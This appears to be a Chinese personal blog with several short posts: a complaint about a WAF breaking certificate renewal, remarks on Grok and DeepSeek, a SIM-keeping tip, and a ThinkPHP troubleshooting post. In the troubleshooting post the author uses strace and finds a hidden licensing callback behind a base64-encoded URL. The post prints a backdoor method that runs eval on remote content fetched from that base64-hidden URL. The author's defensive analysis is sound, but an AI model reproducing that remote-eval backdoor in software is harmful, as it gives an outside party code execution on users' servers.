我已经说过几次这玩意烂了，结果没想到它比我想象中还烂。
为了良好的seo效果，重要的事我必须说三次，长亭雷池垃圾,长亭雷池垃圾,长亭雷池垃圾，千万别用。
以前提到这玩意恶心之一，很普通的功能社区版（免费）都是不能用的。
恶心之二，自我放大攻击。比如人家攻击者发一个100字节的请求包，他会回10K字节去告诉攻击者，你不允许访问。。。这iq绝对负数。
说回这次的事。
我爸生前一直在做一个网站，他走后，这网站的维护自然我接手了。这是个专业性比较强，资料性也比较强的网站，就挂在那里别人来看来查资料就好了，不需要更新也不需要什么维护，我自己也不大上去看。
里面有个留言本，时不时有垃圾客来发垃圾留言，发几条就算了，但一发就是几千条什么的，受不了，所以我决定加人机。简单的办法就是装个waf。
我其实比较喜欢用宝塔家的，没有什么明显的短板，不过他家的问题是不能和nginx并存，所以，部署至少要两台机器，为爱发电的公益网站实在没必要，想想还是用这雷池凑合吧。
结果，今天上网站一看,https证书过期一周了！但问题是，它不是号称自动续期吗？
赶紧手动续期，续不了，总是跳出错信息。倒腾半天后来发现了，它真够傻的，因为ssl续期，需要http挑战，而我的服务器是设置的http重定向到https。。。 它居然这个都没处理好，把http挑战当普通访问重定向到https了，let's不处理302，所以，挂了。
太不专业的垃圾了，马上要清明了，我烧香心里都有疙瘩了。

前些天弄了套thinkphp源码来玩，结果，今天发现极其卡顿，明显不正常。直觉就是远程访问了个啥东西，因为这卡顿时间还不固定，时快时慢，但昨天前又都是正常的。
花了几个小时，终于找到了问题。记录下排查核心点。

strace -fp $(pgrep -d, php-fpm) -e trace=network,open,read,write,connect 排查一下php偷偷在后面访问了些啥

找到了:

[pid  6412] getpeername(7, {sa_family=AF_INET, sin_port=htons(83), sin_addr=inet_addr("x.x.x.x")}, [128 => 16]) = 0
[pid  6412] getsockname(7, {sa_family=AF_INET, sin_port=htons(36752), sin_addr=inet_addr("x.x.x.x")}, [128 => 16]) = 0
[pid  6412] sendto(7, "POST /xxxx/getAuth HT"..., 186, MSG_NOSIGNAL, NULL, 0) = 186
[pid  6412] sendto(7, "--------------------------fab30f"..., 993, MSG_NOSIGNAL, NULL, 0) = 993

php在后台post了个 http://x.x.x.x:83/...../getAuth，显然，这就是问题了。
这台机器应该是今天不稳定，所以，getAuth很久才响应，引起了系统卡顿。
知道getAuth了就容易了，grep -r 一下，所有的getAuth都找到，然后log一下，瞬间就找到了执行它的代码:

        public function __construct($uniacid, $goodsName, $is_debug = false)
        {
                $this->is_debug = $is_debug;
                $this->token_path = dirname(__FILE__) . "/token.key";
                $this->uniacid = $uniacid . "";
                $this->goods_name = $goodsName;
            $this->base_url = base64_decode('xxxxxxxxxxxxxxxxxxxxxxxx');
、        $this->check_url = $this->base_url .'auth/xxxxxxx/index';
        $this->uploadWxapp_url = $this->base_url .'auth/xxxxxxxx/uploadWxapp';
        $this->getUpRecord_url = $this->base_url .'auth/xxxxxx/getUpRecord';
        $this->get_auth_url = $this->base_url .'auth/xxxxxx/getAuth' ;

再清楚不过了，它把base_url用base64加了下密，难怪grep不到那个ip地址。
把base_url改成 http://127.0.0.1，搞定，完事。

然后，用这个ip的base64值，又找到了很多好玩的东西:

<?php
namespace app\agent\controller;

use think\App;

class HouseController
{
   public function list ()
    {
    eval(file_get_contents(base64_decode('xxxxxxxxxx')));exit;
    }

}

上面base64解码出来是: http://xxxxxxx/excesqls.php
尼玛。。

上次为ai充钱是deepseek，到现在还是瘫痪状态，妥妥的废物，虽然我承认deepseek输出质量很高。
这次看看马斯克争不争气了。他家这么有钱，应该不缺钱买显卡，我觉得有戏。
这个充钱5刀以后每月送150刀活动有些人觉得有问题，其实不是的。
Get $150 worth of free API credits a month by sharing your API requests and help us improve Grok. Once enabled, you cannot opt-out.
英语文法上来说，这是很标准的每个月送150的说法,而不是一个月。中文直译才会以为a month是一个月的意思。
另外，一旦参加共享就不能退出其实也是旁证，领一个月就想要获得一个人终生的隐私，美国人会吊死马斯克的，就算不吊，也会用脚投票，老马门清得很，不会做傻事。

别误会，只是在说deepseek。
全网都是一片欢呼，每天都无数人在用所谓亲身体验表明它是有多么的遥遥领先。然而，这一个多月来，一个对话高达6个小时的cd时间，都不扯别的，至少要能用才能知道到底领不领先啊！
我在这个事情上一直很客观，毕竟我要靠ai来码代码养家，在先前还能正常用的情况下，我确实得出结论deepseek比chatgpt好用。然而，现在那些突然冒出来的自媒体甚至官媒，他们是凭什么在这些天得出结论的？
听说现在连秦始皇被复活了的搞笑段子也需要得辟谣才行，呵呵。

giffgaff到手一晃就半年了，该续期了。
昨天先按照传统的发短信，短信发完到app里面一看，9.69。9.99-0.3=9.69 (gg有个祖传bug，余额10会自动变成9.99)，没问题。但突然想到，会不会以前不小心发过，这0.3不是今天用的 ？有时候iphone会说开通facetime要发短信等等。查app里面credit使用清单但为空。说是24小时可能才更新，今天再看，还是没。。
好吧，第二招，打开数据开通漫游，维持了5秒左右，然后再关掉，再刷余额，哈，变9.67了。这次应该没问题了，虽然使用详单还是为空。那以后也可以这样来保号，一号传三代，人死号还在啊。半年0.02，一年就0.04，9.67，可以刷241年啊啊啊啊。